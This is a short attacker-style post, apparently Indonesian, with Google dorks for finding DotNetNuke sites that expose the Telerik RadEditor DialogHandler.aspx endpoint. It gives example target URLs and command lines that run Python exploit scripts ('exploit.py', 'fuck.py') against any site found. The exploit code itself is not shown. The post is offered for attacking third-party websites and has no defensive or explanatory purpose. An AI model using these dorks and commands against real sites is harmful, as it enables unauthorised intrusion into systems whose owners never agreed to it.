Jay Maranatha Hutajulu

Dork:
inurl:DesktopModules/Admin/RadEditorProvider/

exploit:
DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx

Run exploit.py use Python!!
ex = 
exploit.py k -u https://sites.com/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx




Dork : 
-DesktopModules/RadEditorProvider/DialogHandler.aspx 
- inurl:/DesktopModules/RadEditorProvider/DialogHandler.aspx site:

Exploit : 
/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx

Contoh :
http://web.com/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx
 

How To Use : 
$python2 fuck.py -exploit target_kalian 48 hex 9 
